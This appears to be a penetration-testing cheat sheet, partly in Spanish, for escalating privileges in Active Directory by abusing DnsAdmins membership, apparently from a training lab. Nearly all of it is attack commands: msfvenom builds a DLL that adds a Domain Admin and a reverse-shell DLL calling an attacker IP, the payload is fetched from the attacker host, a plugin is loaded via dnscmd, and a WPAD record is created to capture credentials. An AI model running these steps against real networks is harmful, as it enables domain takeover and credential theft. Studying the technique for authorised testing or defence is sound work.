Leveraging DnsAdmins Access

Recursos

• How to View and Modify Service Permissions in Windows

• Abusing DNSAdmins privilege for escalation in Active Directory

• Set-DnsServerGlobalQueryBlockList

---

Tools

• mimilib

• Responder

• Inveigh

---

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
# Or reverse shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f dll > reverse.dll

python3 -m http.server <PORT>

wget "http://<ATTACKER-IP>:<PORT>/adduser.dll" -outfile "adduser.dll"

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Get-ADGroupMember -Identity DnsAdmins
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

wmic useraccount where name="netadm" get sid

sc.exe sdshow DNS
sc stop dns
sc start dns
net group "Domain Admins" /dom

Cleaning Up

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll
sc.exe start dns
sc query dns

---

Using Mimilib.dll

Modificar kdns.c

---

Creating a WPAD Record

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3